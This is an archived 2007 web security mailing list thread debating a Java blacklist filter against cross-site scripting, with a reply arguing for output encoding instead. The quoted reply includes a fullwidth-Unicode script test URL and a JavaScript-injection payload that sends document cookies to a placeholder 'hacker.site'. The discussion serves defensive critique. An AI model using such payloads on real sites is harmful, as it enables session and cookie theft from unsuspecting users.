[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [WEB SECURITY] Re: [Webappsec] xss filter to protect from xss attacks
- From: Anurag Agarwal <a_agrawwal@xxxxxxxxx>
- Subject: Re: [WEB SECURITY] Re: [Webappsec] xss filter to protect from xss attacks
- Date: Tue, 23 Jan 2007 11:05:54 -0800 (PST)
--0-1901347583-1169579154=:61192
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: quoted-printable
I agree that it does not covers all the websites. For examples blogs which =
lets you enter certain html characters or the mathematics site as you menti=
oned, but then in my opinion 5-10% of the websites would require such data =
and even those sites would not require in all of the input. Most of the web=
sites in their regular functionality would not even need the filtered chara=
cters here as input. =0A=0AAnti xss library or such options exist but there=
are two things i wanted to mention about them=0A=0A1. How many developers =
would put in an effort to understand the library and use them as directed. =
This is a very simple approach and any java developer would be able to unde=
rstand this. Moreover, it is very easy to imlpement.=0A2. This is a very li=
ghtweight module as compared to an anti xss library. In a production enviro=
nment why would you want to add more CPU processing when you dont need it. =
With my example this is as simple as it gets for the websites which really =
don't need any of the blacklisted characters here.=0A=0AAlso,=0AEven this a=
pproach is considered as a blacklisted characters approach, in my opinion, =
these are the characters which are used in combination to perform an attack=
(for example using backslash as escape character, 0x for hex, etc). So by b=
locking them we cover most of the basis (when i say most, i mean i am not s=
ure if i missed on any character and hence posted here for my fellow appsec=
professionals to uncover any such character). =0A=0A=0ALastly -=0AOne thin=
g i would like to point out here is that in my personal opinion more then 4=
0% of the code in the production is a result of copy paste from the interne=
t. Developers are looking for a solution which is easier to understand and =
implement. My solution here may be limited for certain types of websites bu=
t can definitely work for most of them.=0A=0AUnless a proper anti xss libra=
ry is built into the framework, there is a bigger chance that the developer=
s might not use it properly. This code here can fix most of the vulnerabili=
ties. Agreed not all but then thats why i posted on these forums to get ide=
as to build this into a more robust and reusable xss filter.=0A =0ACheers,=
=0A =0AAnurag Agarwal=0A =0ASEEC - An application security search engine=0A=
Web: www.attacklabs.com , www.myappsecurity.com=0AEmail : anurag.agarwal@ya=
hoo.com=0ABlog : http://myappsecurity.blogspot.com=0A =0A=0A=0A=0A----- Ori=
ginal Message ----=0AFrom: celf <celf@cudge.org>=0ATo: "webappsec @OWASP" <=
webappsec@lists.owasp.org>=0ACc: WASC Forum <websecurity@webappsec.org>=0AS=
ent: Tuesday, January 23, 2007 8:25:14 AM=0ASubject: [WEB SECURITY] Re: [We=
bappsec] xss filter to protect from xss attacks=0A=0A=0AHello,=0A=0AThe mai=
n problem I see with it is that it could corrupt your data. There=0Amay be =
cases when you actually need those characters to be stored. Take=0Afor exam=
ple, mathematics. It's not uncommon for greater-than, etc.,=0Asymbols to be=
used. Input validation as a means to make output safe does=0Anot work, at =
least not for very long. The simple approach to protecting=0Aagainst XSS is=
to encode it properly for the output layer.=0A=0AI maintain that the best =
way to do this is to format output characters=0Ainto their appropriate HTML=
entities (JavaScript output=0Anotwithstanding). So, < becomes < or <=
;. In fact, I've a page that=0Adoes no input validation at all, but transfo=
rms every output character=0ANOT A-Z0-9 into an HTML entity. This works eve=
n for multi-byte characters.=0A=0ASecond, your filtering approach is the st=
andard "blacklist" approach,=0Aand while it may fine for most things, there=
will be circumstances when=0Ait won't. Take for example:=0A=0Ahttp://www.a=
ttacklabs.com/xssfilter/filter?html=3D%uff1cscript%uff1ealert('xss')%uff1c/=
script%uff1e&B1=3DSubmit=0A=0AOn your site, this simple attack does not wor=
k. However, there is a=0Aknown vulnerability in .NET <=3D 1.1 that does all=
ow this script to=0Aexecute. Note that I didn't try very hard, someone else=
YMMV.=0A=0Ahttp://lists.seifried.org/pipermail/security/2005-February/0070=
54.html=0A=0AFinally, your filter won't work for dynamic paramters being wr=
itten into=0AJavaScript (which I see all the time as an XSS vector), e.g.,=
=0A=0Acode:=0Aresponse.write("<script>x=3D'"&<%=3Dserver_side_var%>&"';aler=
t(x);</script>")=0A=0Aexploit (sending this as the server side param value)=
:=0Aa'; document.location=3D'hacker.site?cookies=3D'+document.cookies;var y=
=3D'a=0A=0ASo, your approach works, it's just tough to maintain when new ex=
ploits=0Acome out or when not applied to a very specific case. Admittedly, =
my=0Aapproach isn't complete here either, but I'm sure others have more to =
add.=0A=0A-c=0A=0Aanurag.agarwal@yahoo.com wrote:=0A> The source code is up=
loaded to the page. You can either view it=0A> at http://myappsecurity.blog=
spot.com/2007/01/xss-filter-to-protect-from-xss-attacks.html or=0A> downloa=
d the java file at http://www.attacklabs.com/xssfilter/XSSFilter.java=0A> =
=0A> The url to test this filter is http://www.attacklabs.com/xssfilter/=0A=
> =0A> =0A> Cheers,=0A> =0A> =0A> =0A> Anurag Agarwal=0A> =0A> =0A> =0A>=
SEEC - An application security search engine <http://www.myappsecurity.com=
/>=0A> =0A> Web: www.attacklabs.com <http://www.attacklabs.com/> ,=0A> www.=
myappsecurity.com <http://www.myappsecurity.com/>=0A> =0A> Email : anurag.a=
garwal@yahoo.com <mailto:anurag.agarwal@yahoo.com>=0A> =0A> Blog : http://m=
yappsecurity.blogspot.com=0A> <http://myappsecurity.blogspot.com/>=0A> =0A>=
=0A> =0A> =0A> =0A> ----- Original Message ----=0A> From: Amit Klein <aks=
ecurity@gmail.com>=0A> To: Anurag Agarwal <anurag.agarwal@yahoo.com>=0A> Cc=
: WASC Forum <websecurity@webappsec.org>; "webappsec @OWASP"=0A> <webappsec=
@lists.owasp.org>=0A> Sent: Monday, January 22, 2007 11:50:06 PM=0A> Subjec=
t: Re: [Webappsec] xss filter to protect from xss attacks=0A> =0A> Anurag A=
garwal wrote:=0A>> I have created a xss filter to protect from xss attacks.=
Though i have=0A>> filtered only for 8 characters but i was able to test a=
gainst all the=0A>> attacks mentioned in the RSnake's cheat sheet. Appscan =
was not able to=0A>> detect any xss attacks on it. I request the applicatio=
n security=0A>> community to help test this filter. 90% i am sure that you =
wont be=0A>> able to perform any xss attack on it, the rest 10% i will find=
out=0A>> after the feedback from the community. For the curious mind, it i=
s=0A>> written in java=0A> If this is an open source project - then where i=
s the source code? if=0A> it's not - then why should we bother testing it?=
=0A> =0A> =0A> ------------------------------------------------------------=
------------=0A> =0A> _______________________________________________=0A> W=
ebappsec mailing list=0A> Webappsec@lists.owasp.org=0A> http://lists.owasp.=
org/mailman/listinfo/webappsec=0A=0A=0A------------------------------------=
----------------------------------------=0AThe Web Security Mailing List: =
=0Ahttp://www.webappsec.org/lists/websecurity/=0A=0AThe Web Security Mailin=
g List Archives: =0Ahttp://www.webappsec.org/lists/websecurity/archive/=0Ah=
ttp://www.webappsec.org/rss/websecurity.rss [RSS Feed]
--0-1901347583-1169579154=:61192
Content-Type: text/html; charset=iso-8859-1
Content-Transfer-Encoding: quoted-printable
<html><head><style type=3D"text/css"><!-- DIV {margin:0px;} --></style></he=
ad><body><div style=3D"font-family:arial, helvetica, sans-serif;font-size:1=
0pt"><P>I agree that it does not covers all the websites. For examples blog=
s which lets you enter certain html characters or the mathematics site as y=
ou mentioned, but then in my opinion 5-10% of the websites would require su=
ch data and even those sites would not require in all of the input. Mo=
st of the websites in their regular functionality would not even need the f=
iltered characters here as input. </P>=0A<P> </P>=0A<P>Anti xss librar=
y or such options exist but there are two things i wanted to mention about =
them</P>=0A<P> </P>=0A<P>1. How many developers would put in an effort=
to understand the library and use them as directed. This is a very simple =
approach and any java developer would be able to understand this. Moreover,=
it is very easy to imlpement.</P>=0A<P>2. This is a very lightweight modul=
e as compared to an anti xss library. In a production environment why would=
you want to add more CPU processing when you dont need it. With my example=
this is as simple as it gets for the websites which really don't need=
any of the blacklisted characters here.</P>=0A<P> </P>=0A<P>Also,</P>=
=0A<P>Even this approach is considered as a blacklisted characters app=
roach, in my opinion, these are the characters which are used in combi=
nation to perform an attack(for example using backslash as escape character=
, 0x for hex, etc). So by blocking them we cover most of the basis (when i =
say most, i mean i am not sure if i missed on any character and hence poste=
d here for my fellow appsec professionals to uncover any such character). <=
/P>=0A<P> </P>=0A<DIV></DIV>=0A<DIV> </DIV>=0A<DIV>Lastly -</DIV>=
=0A<DIV>One thing i would like to point out here is that in my personal opi=
nion more then 40% of the code in the production is a result of copy paste =
from the internet. Developers are looking for a solution which is =
;easier to understand and implement. My solution here may be limited for ce=
rtain types of websites but can definitely work for most of them.</DIV=
>=0A<DIV> </DIV>=0A<DIV>Unless a proper anti xss library is built into=
the framework, there is a bigger chance that the developers might not use =
it properly. This code here can fix most of the vulnerabilities. Agreed not=
all but then thats why i posted on these forums to get ideas to build this=
into a more robust and reusable xss filter.</DIV>=0A<DIV> </DIV>=0A<P=
>Cheers,</P>=0A<P> </P>=0A<P>Anurag Agarwal</P>=0A<P> </P>=0A<P><=
A href=3D"http://www.myappsecurity.com/";>SEEC - An application security sea=
rch engine</A></P>=0A<P>Web: <A href=3D"http://www.attacklabs.com/";>ww=
w.attacklabs.com</A> , <A href=3D"http://www.myappsecurity.com/";>www.m=
yappsecurity.com</A></P>=0A<P>Email : <A href=3D"mailto:anurag.agarwal@yaho=
o.com">anurag.agarwal@yahoo.com</A></P>=0A<P>Blog : <A href=3D"http://myapp=
security.blogspot.com/">http://myappsecurity.blogspot.com</A></P>=0A<P>&nbs=
p;</P>=0A<DIV style=3D"FONT-SIZE: 10pt; FONT-FAMILY: arial, helvetica, sans=
-serif"><BR><BR>=0A<DIV style=3D"FONT-SIZE: 12pt; FONT-FAMILY: times new ro=
man, new york, times, serif">----- Original Message ----<BR>From: celf <=
celf@cudge.org><BR>To: "webappsec @OWASP" <webappsec@lists.owasp.org&=
gt;<BR>Cc: WASC Forum <websecurity@webappsec.org><BR>Sent: Tuesday, J=
anuary 23, 2007 8:25:14 AM<BR>Subject: [WEB SECURITY] Re: [Webappsec] xss f=
ilter to protect from xss attacks<BR><BR>=0A<DIV>Hello,<BR><BR>The main pro=
blem I see with it is that it could corrupt your data. There<BR>may be case=
s when you actually need those characters to be stored. Take<BR>for example=
, mathematics. It's not uncommon for greater-than, etc.,<BR>symbols to be u=
sed. Input validation as a means to make output safe does<BR>not work, at l=
east not for very long. The simple approach to protecting<BR>against XSS is=
to encode it properly for the output layer.<BR><BR>I maintain that the bes=
t way to do this is to format output characters<BR>into their appropriate H=
TML entities (JavaScript output<BR>notwithstanding). So, < becomes &=
lt; or &#60;. In fact, I've a page that<BR>does no input validation at =
all, but transforms every output character<BR>NOT A-Z0-9 into an HTML entit=
y. This works even for multi-byte characters.<BR><BR>Second, your filtering=
approach is the standard "blacklist" approach,<BR>and while it may fine fo=
r most things, there will be circumstances when<BR>it
won't. Take for example:<BR><BR><A href=3D"http://www.attacklabs.com/xssfi=
lter/filter?html=3D%uff1cscript%uff1ealert(" target=3D_blank script%uff1e&a=
mp;B1=3D"Submit'" xss?)%uff1c>http://www.attacklabs.com/xssfilter/filter?ht=
ml=3D%uff1cscript%uff1ealert('xss')%uff1c/script%uff1e&B1=3DSubmit</A><=
BR><BR>On your site, this simple attack does not work. However, there is a<=
BR>known vulnerability in .NET <=3D 1.1 that does allow this script to<B=
R>execute. Note that I didn't try very hard, someone else YMMV.<BR><BR><A h=
ref=3D"http://lists.seifried.org/pipermail/security/2005-February/007054.ht=
ml" target=3D_blank>http://lists.seifried.org/pipermail/security/2005-Febru=
ary/007054.html</A><BR><BR>Finally, your filter won't work for dynamic para=
mters being written into<BR>JavaScript (which I see all the time as an XSS =
vector), e.g.,<BR><BR>code:<BR>response.write("<script>x=3D'"&<=
;%=3Dserver_side_var%>&"';alert(x);</script>")<BR><BR>exploit =
(sending this as the server side
param value):<BR>a'; document.location=3D'hacker.site?cookies=3D'+document=
.cookies;var y=3D'a<BR><BR>So, your approach works, it's just tough to main=
tain when new exploits<BR>come out or when not applied to a very specific c=
ase. Admittedly, my<BR>approach isn't complete here either, but I'm sure ot=
hers have more to add.<BR><BR>-c<BR><BR>anurag.agarwal@yahoo.com wrote:<BR>=
> The source code is uploaded to the page. You can either view it<BR>>=
; at <A href=3D"http://myappsecurity.blogspot.com/2007/01/xss-filter-to-pro=
tect-from-xss-attacks.html" target=3D_blank>http://myappsecurity.blogspot.c=
om/2007/01/xss-filter-to-protect-from-xss-attacks.html</A> or<BR>> downl=
oad the java file at <A href=3D"http://www.attacklabs.com/xssfilter/XSSFilt=
er.java" target=3D_blank>http://www.attacklabs.com/xssfilter/XSSFilter.java=
</A><BR>> <BR>> The url to test this filter is <A href=3D"=
http://www.attacklabs.com/xssfilter/";
target=3D_blank>http://www.attacklabs.com/xssfilter/</A><BR>> &nbs=
p;<BR>> <BR>> Cheers,<BR>> <BR>> <BR>> <BR>> A=
nurag Agarwal<BR>> <BR>> <BR>> <BR>> SEEC - An appli=
cation security search engine <<A href=3D"http://www.myappsecurity.com/"=
target=3D_blank>http://www.myappsecurity.com/</A>><BR>> <BR>> Web=
: <A href=3D"http://www.attacklabs.com/"; target=3D_blank>www.attacklabs.com=
</A> <<A href=3D"http://www.attacklabs.com/"; target=3D_blank>http://www.=
attacklabs.com/</A>> ,<BR>> <A href=3D"http://www.myappsecurity.com/"=
target=3D_blank>www.myappsecurity.com</A> <<A href=3D"http://www.myapps=
ecurity.com/" target=3D_blank>http://www.myappsecurity.com/</A>><BR>>=
<BR>> Email : anurag.agarwal@yahoo.com <mailto:anurag.agarwal@yahoo.=
com><BR>> <BR>> Blog : <A href=3D"http://myappsecurity.blogspot.co=
m/" target=3D_blank>http://myappsecurity.blogspot.com</A><BR>> <<A hr=
ef=3D"http://myappsecurity.blogspot.com/";
target=3D_blank>http://myappsecurity.blogspot.com/</A>><BR>> <BR>>=
; <BR>> <BR>> <BR>> <BR>> ----- Original Message ---=
-<BR>> From: Amit Klein <aksecurity@gmail.com><BR>> To: Anurag =
Agarwal <anurag.agarwal@yahoo.com><BR>> Cc: WASC Forum <websecu=
rity@webappsec.org>; "webappsec @OWASP"<BR>> <webappsec@lists.owas=
p.org><BR>> Sent: Monday, January 22, 2007 11:50:06 PM<BR>> Subjec=
t: Re: [Webappsec] xss filter to protect from xss attacks<BR>> <BR>> =
Anurag Agarwal wrote:<BR>>> I have created a xss filter to protect fr=
om xss attacks. Though i have<BR>>> filtered only for 8 characters bu=
t i was able to test against all the<BR>>> attacks mentioned in the R=
Snake's cheat sheet. Appscan was not able to<BR>>> detect any xss att=
acks on it. I request the application security<BR>>> community to hel=
p test this filter. 90% i am sure that you wont be<BR>>> able to perf=
orm any xss
attack on it, the rest 10% i will find out<BR>>> after the feedback =
from the community. For the curious mind, it is<BR>>> written in java=
<BR>> If this is an open source project - then where is the source code?=
if<BR>> it's not - then why should we bother testing it?<BR>> <BR>&g=
t; <BR>> ---------------------------------------------------------------=
---------<BR>> <BR>> _______________________________________________<=
BR>> Webappsec mailing list<BR>> Webappsec@lists.owasp.org<BR>> <A=
href=3D"http://lists.owasp.org/mailman/listinfo/webappsec"; target=3D_blank=
>http://lists.owasp.org/mailman/listinfo/webappsec</A><BR><BR><BR>---------=
-------------------------------------------------------------------<BR>The =
Web Security Mailing List: <BR><A href=3D"http://www.webappsec.org/lists/we=
bsecurity/" target=3D_blank>http://www.webappsec.org/lists/websecurity/</A>=
<BR><BR>The Web Security Mailing List Archives: <BR><A
href=3D"http://www.webappsec.org/lists/websecurity/archive/"; target=3D_bla=
nk>http://www.webappsec.org/lists/websecurity/archive/</A><BR><A href=3D"ht=
tp://www.webappsec.org/rss/websecurity.rss" target=3D_blank>http://www.weba=
ppsec.org/rss/websecurity.rss</A> [RSS Feed]</DIV></DIV><BR></DIV></div></b=
ody></html>
--0-1901347583-1169579154=:61192--
Brought to you by http://www.webappsec.org
Search this site
|